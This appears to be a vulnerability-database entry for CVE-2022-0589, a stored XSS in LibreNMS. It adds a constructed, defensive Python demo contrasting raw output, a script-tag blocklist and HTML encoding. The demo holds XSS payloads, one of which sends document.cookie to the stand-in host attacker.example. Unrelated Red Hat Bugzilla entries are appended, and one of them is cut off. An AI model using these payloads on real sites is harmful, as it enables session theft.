CVE-2022-0589
Published 2022-02-15
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
Priority: P4 (24) · Severity: medium · CVSS 3.1 base score: 5.4
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.83% (percentile 53.1)
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| librenms | librenms | < 22.1.0 | 22.1.0 |
| librenms | librenms | >= 0 < 22.1.0 | 22.1.0 |
| librenms | librenms_librenms | >= unspecified < 22.1.0 | 22.1.0 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 5.4 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| NVD | 3.0 | 5.4 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L |
| NVD | 2.0 | 3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |
GHSA (2022-02-16): CVE-2022-0589 [MEDIUM] CWE-79 Cross-site Scripting in librenms
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
OSV (2022-02-16): CVE-2022-0589 [MEDIUM] Cross-site Scripting in librenms
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
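CWE-79 in its stored form means text saved by one user is later emitted into a page for another user without output encoding; the NVD v3.1 vector (PR:L, UI:R, S:C) is the usual shape for that, with a low-privileged account planting the value and an administrator triggering it by viewing the page. The example below is added here and is not LibreNMS code: the note field, the `<td>` template and the payloads are constructed, and it is written in Python so the rule stays independent of the framework (in PHP the equivalent sink-side call is `htmlspecialchars($value, ENT_QUOTES)`; in a Blade template `{{ $value }}` rather than `{!! $value !!}`). It contrasts raw concatenation, a blocklist that strips `<script>`, and entity encoding at the output sink, and uses the standard library's HTML tokenizer to check which renderings a browser would treat as new markup.

```python
"""Stored XSS (CWE-79): raw output vs blocklist vs output encoding.
Added example, not LibreNMS code; the note field, template and payloads
are constructed for illustration."""
import html
from html.parser import HTMLParser

# Constructed attacker-controlled strings, as a low-privileged user (PR:L)
# could save them; an administrator later opens the page (UI:R).
PAYLOADS = [
    '<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    '<img src=x onerror="alert(document.domain)">',
    '" autofocus onfocus="alert(1)',  # no tag at all: breaks out of the attribute
]

# Constructed template: the stored note lands in a text node and in an attribute.
TEMPLATE = '<td class="notes" title="{v}">{v}</td>'

def render_unsafe(note: str) -> str:
    """Vulnerable pattern: stored text concatenated straight into markup."""
    return TEMPLATE.format(v=note)

def render_blocklist(note: str) -> str:
    """A common wrong fix: strip one dangerous tag and keep concatenating."""
    cleaned = note.replace("<script>", "").replace("</script>", "")
    return TEMPLATE.format(v=cleaned)

def render_safe(note: str) -> str:
    """The fix: HTML-entity-encode at the output sink. quote=True also
    encodes ' and ", which is what keeps the attribute context intact."""
    return TEMPLATE.format(v=html.escape(note, quote=True))

class _MarkupAudit(HTMLParser):
    """Record the elements and on* attributes a browser-like tokenizer sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [n for n, _ in attrs if n.lower().startswith("on")]

def injected(rendered: str) -> bool:
    """True when the note became markup: any element beyond the template's
    single <td>, or any event-handler attribute anywhere."""
    audit = _MarkupAudit()
    audit.feed(rendered)
    audit.close()
    return audit.tags != ["td"] or bool(audit.handlers)

def audit_all() -> dict:
    """For each renderer, which of the constructed payloads turn into markup."""
    renderers = (("unsafe", render_unsafe),
                 ("blocklist", render_blocklist),
                 ("safe", render_safe))
    return {name: [injected(fn(p)) for p in PAYLOADS] for name, fn in renderers}

if __name__ == "__main__":
    for name, results in audit_all().items():
        print(f"{name:10} injected per payload: {results}")
```

The blocklist renderer neutralises the first payload and passes the other two, which is the general failure of input filtering for XSS: the set of dangerous strings depends on the output context, so the encoding has to happen where the value is emitted, with the quoting rules of that context.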
No detection rules found.
No public exploits indexed.
The Bugzilla entries below reference the Red Hat advisory RHSA-2022:0589 and describe other CVEs (CVE-2021-4178 and CVE-2021-41269); they are not about CVE-2022-0589.
Bugzilla (2021-12-20, CVSS 6.7): CVE-2021-4178 [MEDIUM] kubernetes-client: Insecure deserialization in unmarshalYaml method
A flaw was found in kubernetes-client. An insecure deserialization issue due to the use of the SnakeYAML library may lead to arbitrary code execution.
References:
https://github.com/fabric8io/kubernetes-client/issues/3653
Discussion:
This issue has been addressed in the following products:
Red Hat AMQ Streams 1.6.7
Via RHSA-2022:0467 https://access.redhat.com/errata/RHSA-2022:0467
---
This issue has been addressed in the following products:
Red Hat AMQ Streams 2.0.1
Via RHSA-2022:0469 https://access.redhat.com/errata/RHSA-2022:0469
---
This issue has been addressed in the following products:
Red Hat build of Quarkus 2.2.5
Via RHSA-2022:0589 https://access.redhat.com/errata/RHSA-2022:0589
---
Bugzilla (2021-11-18, CVSS 9.8): CVE-2021-41269 [CRITICAL] cron-utils: template injection leading to unauthenticated Remote Code Execution
A template injection was identified in cron-utils enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability.
Upstream Advisory:
https://github.com/jmrozanec/cron-utils/security/advisories/GHSA-p9m8-27x8-rg87
Discussion:
This issue has been addressed in the following products:
Red Hat build of Quarkus 2.2.5
Via RHSA-2022:0589 https://access.redhat.com/errata/RHSA-2022:0589
---
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):
https://access.redhat.com/security/cve/cve-2021-41269
---
This issue has been addressed in the following products:
RHINT Camel-Q 2.2.1
Via
References
https://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fa
https://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768
https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html
Published 2022-02-15